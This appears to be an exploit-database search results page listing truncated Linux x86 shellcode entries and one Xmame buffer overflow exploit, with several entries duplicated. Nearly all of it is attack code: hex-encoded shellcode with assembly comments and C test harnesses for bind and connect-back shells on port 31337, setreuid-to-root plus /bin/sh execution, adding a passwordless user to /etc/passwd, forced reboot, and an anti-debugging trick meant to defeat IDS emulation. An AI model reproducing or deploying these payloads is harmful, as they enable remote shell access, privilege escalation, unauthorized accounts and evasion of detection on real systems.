7258 matches found
linux/x86 normal exit w/ random (so to speak) return value 5 bytes
Exploit for linux/x86 platform in category shellcode ================================================================== linux/x86 normal exit w/ random so to speak return value 5 bytes ================================================================== / linux/x86 normal exit w/ random so to speak...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
Exploit for linux/x86 platform in category shellcode ============================================ linux/x86 Bind /bin/sh to 31337/tcp 80 bytes ============================================ / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" ...
linux/x86 normal exit w/ random (so to speak) return value 5 bytes
No description provided by source. / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik [email protected] / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; //...
linux/x86 normal exit with random so to speak return value 5 bytes
linux/x86 normal exit w/ random so to speak return value 5 bytes. Shellcode exploit for linx86 platform / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char arg...
linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes ===================================================================== / linux/x86 quick yet conditional, e...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 // /...
linux/x86 reboot() - 20 bytes
Exploit for linux/x86 platform in category shellcode ============================= linux/x86 reboot - 20 bytes ============================= / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %e...
Xmame 0.102 - -pb-lang-rec Local Buffer Overflow
Xmame 0.102 - -pb-lang-rec Local Buffer Overflow / xmame-expl.c by sj [email protected] On 20th of Jan it came to my attention that Xmame suffered from several buffer overflow problems. Thinking this issue was resolved, I installed Xmame on my Ubuntu laptop, from the Ubuntu repositories which installed...
linux/x86 reboot() - 20 bytes
No description provided by source. / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik [email protected] / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" // mov...
linux/x86 anti-debug trick (INT 3h trap) + execve /bin/sh 39 bytes
No description provided by source. / linux/x86 anti-debug trick INT 3h trap + execve"/bin/sh", "/bin/sh", NULL, NULL - 39 bytes The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS would try to x86-emulate the shellcode it would glitch and fail. This...
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes. Shellcode exploit for linx86 platform / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx...
linux/x86 Adduser without Password to /etc/passwd 59 bytes
Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 Adduser without Password to /etc/passwd 59 bytes ========================================================== / linux/x86 adds user 'xtz' without password to /etc/passwd - 59...
linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes
No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...
linux/x86 quick (yet conditional eax != 0 and edx == 0) exit 4 bytes
No description provided by source. / linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik [email protected] / char shellcode = "\xf7\xf0" // div %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; // milw0rm.com 2006-01-...
linux/x86 execve(/bin/sh) / PUSH - 23 bytes
No description provided by source. / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik [email protected] / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push...
linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes
Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 getppid + execve/proc/pid/exe 51 bytes ==================================================== / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes =================================================== / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes. Shellcode exploit for linx86 platform / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx...
linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes
linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes. Shellcode exploit for linx86 platform / linux/x86 anti-debug trick INT 3h trap + execve"/bin/sh", "/bin/sh", NULL, NULL - 39 bytes The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS...